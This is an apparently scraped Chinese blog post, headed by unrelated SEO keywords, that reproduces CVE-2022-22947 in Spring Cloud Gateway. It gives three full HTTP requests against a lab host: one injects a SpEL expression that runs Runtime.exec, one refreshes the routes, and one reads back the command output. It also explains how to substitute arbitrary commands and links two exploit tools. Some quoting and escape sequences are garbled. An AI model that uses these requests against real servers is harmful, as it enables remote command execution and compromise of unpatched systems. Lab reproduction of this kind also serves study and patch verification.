湖南网站营销优化开发,长沙市住房和城乡建设部网站,wordpress猜你喜欢,2021年年度关键词Spring boot命令执行 (CVE-2022-22947)漏洞复现和相关利用工具
名称: spring 命令执行 (CVE-2022-22947)
描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本#xff08;包含#xff09;以前存在一处SpEL表达式注入漏洞#xff0c;当攻击者可以访问A…Spring boot命令执行 (CVE-2022-22947)漏洞复现和相关利用工具
名称: spring 命令执行 (CVE-2022-22947)
描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本包含以前存在一处SpEL表达式注入漏洞当攻击者可以访问Actuator API的情况下将可以利用该漏洞执行任意命令。
影响版本
Spring Cloud Gateway 3.1.x 3.1.1
Spring Cloud Gateway 3.0.x 3.0.7
第一个数据包
打开靶场抓取请求的数据包
切换成POST模式请求这个地址提交内容如下返回201即为成功
可以更换请求路径中的test为你自己的方法也可以更换value值里面的id命令为其它执行命令
POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.91.129:15001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 329{id: hacktest,filters: [{name: AddResponseHeader,args: {name: Result,value: #{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\id\}).getInputStream()))}}}],uri: http://example.com
}
第二个数据包
再请求这个路径
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.91.129:15001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3123
第三个数据包
再请求这个路径命令就会被执行。
GET /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.91.129:15001
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q0.9,zh;q0.8
Cookie: b-user-id98bc3e19-a246-205e-df14-b0f6176e841d; vue_admin_template_tokeneyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzAxMzMzMTQxLCJlbWFpbCI6IiJ9.AlEzzqoZtAFFONBaJRMjjMEji7OJNLT8UxrAgbttBqc; sidebarStatus0; JSESSIONID6F5D2993DEE6FC179A1F71F6045DE7AA
If-None-Match: 3147526947gzip
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
Connection: close
在这三次的请求中会更换请求头的内容。如果发现卡住不成功的情况。那就重新抓一个包
如果要执行其它命令需要从第一步到第三步都请求一遍。
也有利用工具
https://github.com/0x727/SpringBootExploit
https://github.com/13exp/SpringBoot-Scan-GUI
